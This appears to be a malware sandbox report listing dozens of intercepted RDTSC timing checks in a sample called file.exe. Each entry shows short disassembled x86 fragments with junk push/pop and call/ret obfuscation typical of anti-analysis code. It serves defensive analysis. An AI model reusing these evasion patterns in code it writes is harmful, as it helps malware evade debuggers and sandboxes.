Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C1F1B second address: 11C1F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F99146B45A3h 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jns 00007F99146B45A0h 0x00000015 mov eax, dword ptr [eax] 0x00000017 push eax 0x00000018 push edx 0x00000019 jnc 00007F99146B4598h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C1F54 second address: 11C1F59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B1BC4 second address: 11B1BC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B1BC8 second address: 11B1BD2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F99150F94F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B1BD2 second address: 11B1BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B1BDB second address: 11B1BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E1EEE second address: 11E1F04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jg 00007F99146B459Ch 0x0000000b pop ecx 0x0000000c pushad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E2245 second address: 11E224D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E224D second address: 11E2265 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F99146B459Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F99146B4596h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E23DC second address: 11E23E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E23E2 second address: 11E23E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E23E6 second address: 11E23EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E23EA second address: 11E23FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F99146B45B0h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D7D0E second address: 11D7D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D7D16 second address: 11D7D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99146B459Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D7D25 second address: 11D7D37 instructions: 0x00000000 rdtsc 0x00000002 je 00007F99150F94F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F99150F94FCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E2C9F second address: 11E2CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E3368 second address: 11E3396 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99150F9502h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F99150F9508h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E3396 second address: 11E339A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E78F2 second address: 11E78F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E69D5 second address: 11E69EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99146B45A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E69EF second address: 11E69F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E7BE5 second address: 11E7BFF instructions: 0x00000000 rdtsc 0x00000002 js 00007F99146B4598h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 jnl 00007F99146B4596h 0x00000019 pop edi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E7BFF second address: 11E7C26 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F99150F94F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F99150F9507h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E7D84 second address: 11E7D89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E8F24 second address: 11E8F2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F99150F94F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EE867 second address: 11EE899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F99146B459Ah 0x0000000d pop eax 0x0000000e jnl 00007F99146B45A9h 0x00000014 popad 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EE899 second address: 11EE8B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99150F9507h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EE8B4 second address: 11EE8D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F99146B45A5h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11ACA8D second address: 11ACA92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EDD69 second address: 11EDD6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EDD6D second address: 11EDD71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EDD71 second address: 11EDD97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99146B45A5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jl 00007F99146B4596h 0x00000012 pop edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EDD97 second address: 11EDD9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EDD9F second address: 11EDDDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99146B45A6h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F99146B45A9h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push edi 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EDDDD second address: 11EDDE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F99150F94F6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EDDE8 second address: 11EDDEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EDDEE second address: 11EDDF4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EDF25 second address: 11EDF29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EDF29 second address: 11EDF33 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F99150F94F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EE45E second address: 11EE462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F151D second address: 11F152F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F99150F94F6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F152F second address: 11F154A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99146B45A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F154A second address: 11F1550 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F1550 second address: 11F1554 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F1896 second address: 11F189A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F1F97 second address: 11F1FBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jns 00007F99146B45A8h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F1FBF second address: 11F1FC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F2220 second address: 11F2225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F2A2C second address: 11F2AC8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F99150F94F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F99150F94FBh 0x00000011 nop 0x00000012 stc 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F99150F94F8h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007F99150F94F8h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 0000001Ah 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b jnc 00007F99150F94FFh 0x00000051 xchg eax, ebx 0x00000052 jnp 00007F99150F950Ah 0x00000058 push eax 0x00000059 push ebx 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007F99150F9503h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F2AC8 second address: 11F2ACC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F34B6 second address: 11F34BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F5113 second address: 11F5119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F5119 second address: 11F511D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F511D second address: 11F5181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov edi, dword ptr [ebp+122D1923h] 0x00000011 jnl 00007F99146B459Ch 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c call 00007F99146B4598h 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], edx 0x00000026 add dword ptr [esp+04h], 00000018h 0x0000002e inc edx 0x0000002f push edx 0x00000030 ret 0x00000031 pop edx 0x00000032 ret 0x00000033 jmp 00007F99146B45A1h 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b push ecx 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F99146B459Eh 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F5CF4 second address: 11F5CF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F5A98 second address: 11F5AD5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F99146B45A0h 0x00000008 jmp 00007F99146B459Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007F99146B459Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F99146B45A9h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F5CF9 second address: 11F5D1D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F99150F94FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F99150F94FFh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F5D1D second address: 11F5D38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99146B45A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F6839 second address: 11F683E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F683E second address: 11F6844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F6844 second address: 11F68B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnc 00007F99150F9512h 0x0000000e nop 0x0000000f jmp 00007F99150F9507h 0x00000014 push 00000000h 0x00000016 mov dword ptr [ebp+122D3325h], esi 0x0000001c push 00000000h 0x0000001e mov dword ptr [ebp+122D36FAh], eax 0x00000024 xchg eax, ebx 0x00000025 jmp 00007F99150F9507h 0x0000002a push eax 0x0000002b pushad 0x0000002c pushad 0x0000002d jg 00007F99150F94F6h 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F70B6 second address: 11F70BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AB058 second address: 11AB062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F99150F94F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AB062 second address: 11AB068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AB068 second address: 11AB06E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FB2E2 second address: 11FB2E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FB2E8 second address: 11FB2EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FEEA0 second address: 11FEEB5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F99146B4598h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FEF66 second address: 11FEF6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1200F60 second address: 1200F65 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12000E5 second address: 12000FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99150F94FFh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1201FFA second address: 1202096 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F99146B4596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov dword ptr [esp], eax 0x0000000e jmp 00007F99146B459Ah 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007F99146B4598h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f jmp 00007F99146B45A0h 0x00000034 jmp 00007F99146B45A0h 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push edx 0x0000003e call 00007F99146B4598h 0x00000043 pop edx 0x00000044 mov dword ptr [esp+04h], edx 0x00000048 add dword ptr [esp+04h], 0000001Ah 0x00000050 inc edx 0x00000051 push edx 0x00000052 ret 0x00000053 pop edx 0x00000054 ret 0x00000055 xchg eax, esi 0x00000056 js 00007F99146B45A3h 0x0000005c jmp 00007F99146B459Dh 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 push ebx 0x00000066 pop ebx 0x00000067 push ebx 0x00000068 pop ebx 0x00000069 popad 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1202E68 second address: 1202E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1202E6C second address: 1202E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1202E72 second address: 1202F0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99150F94FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F99150F94F8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 push 00000000h 0x00000028 mov dword ptr [ebp+122D1A58h], esi 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007F99150F94F8h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 0000001Ch 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a sub dword ptr [ebp+122D1871h], ecx 0x00000050 xchg eax, esi 0x00000051 pushad 0x00000052 jno 00007F99150F94FCh 0x00000058 jmp 00007F99150F9500h 0x0000005d popad 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F99150F9501h 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1203F62 second address: 1203F66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1203F66 second address: 1203FCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F99150F94FEh 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edi, 564E46DEh 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F99150F94F8h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000017h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 mov di, 60A1h 0x00000034 push 00000000h 0x00000036 call 00007F99150F9502h 0x0000003b jbe 00007F99150F94F9h 0x00000041 mov di, ax 0x00000044 pop edi 0x00000045 xchg eax, esi 0x00000046 push eax 0x00000047 push edx 0x00000048 push ecx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1203FCC second address: 1203FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1203FD1 second address: 1203FE2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jng 00007F99150F94F6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1203FE2 second address: 1203FE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12051BF second address: 12051FD instructions: 0x00000000 rdtsc 0x00000002 jp 00007F99150F950Ah 0x00000008 jmp 00007F99150F9504h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007F99150F950Dh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12051FD second address: 1205203 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1207009 second address: 120700D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1206106 second address: 120610A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120610A second address: 1206118 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F99150F94F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1206118 second address: 120611C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1208156 second address: 120815A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1208F9F second address: 1208FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
